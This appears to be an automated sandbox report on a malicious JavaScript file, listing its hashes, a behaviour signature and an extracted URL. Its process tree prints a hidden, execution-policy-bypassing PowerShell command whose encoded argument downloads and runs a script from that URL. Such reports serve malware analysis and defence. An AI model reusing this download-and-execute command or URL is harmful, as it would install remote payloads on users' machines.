Analysis
-
max time kernel
0s -
max time network
124s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
11/01/2024, 20:31
Static task
static1
Behavioral task
behavioral1
Sample
545c6dfa821390d6601750e65828543b.js
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
545c6dfa821390d6601750e65828543b.js
Resource
win10v2004-20231215-en
General
-
Target
545c6dfa821390d6601750e65828543b.js
-
Size
69KB
-
MD5
545c6dfa821390d6601750e65828543b
-
SHA1
7212c76c1e23c93613ac14726d55db8119a958be
-
SHA256
e39037aac299ed46ba0f22a0b3466c323ecb86a09c835e74ff4a33e7547407b1
-
SHA512
d72c0a2e852d4d0865eab657a902aaa9e8718ad8bafde59cf6afb2522c6ec5d73d3b9e332ae96faf4fd8412ff4a4a72b02fcfa4c9f637cf82eb9ae0342e37775
-
SSDEEP
1536:59Ry98guHVBqqg2bcruayUHmLKeZaMU7GwbWBPwVGWl9SZ8kV8Gp/5bzIEN4t/or:59Ry98guHVBqqg2bcruzUHmLKeMMU7Gd
Malware Config
Extracted
http://smart-integrator.hr/pornhub.php
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\545c6dfa821390d6601750e65828543b.js1⤵PID:1692
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA2⤵PID:924
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA3⤵PID:5052
-
-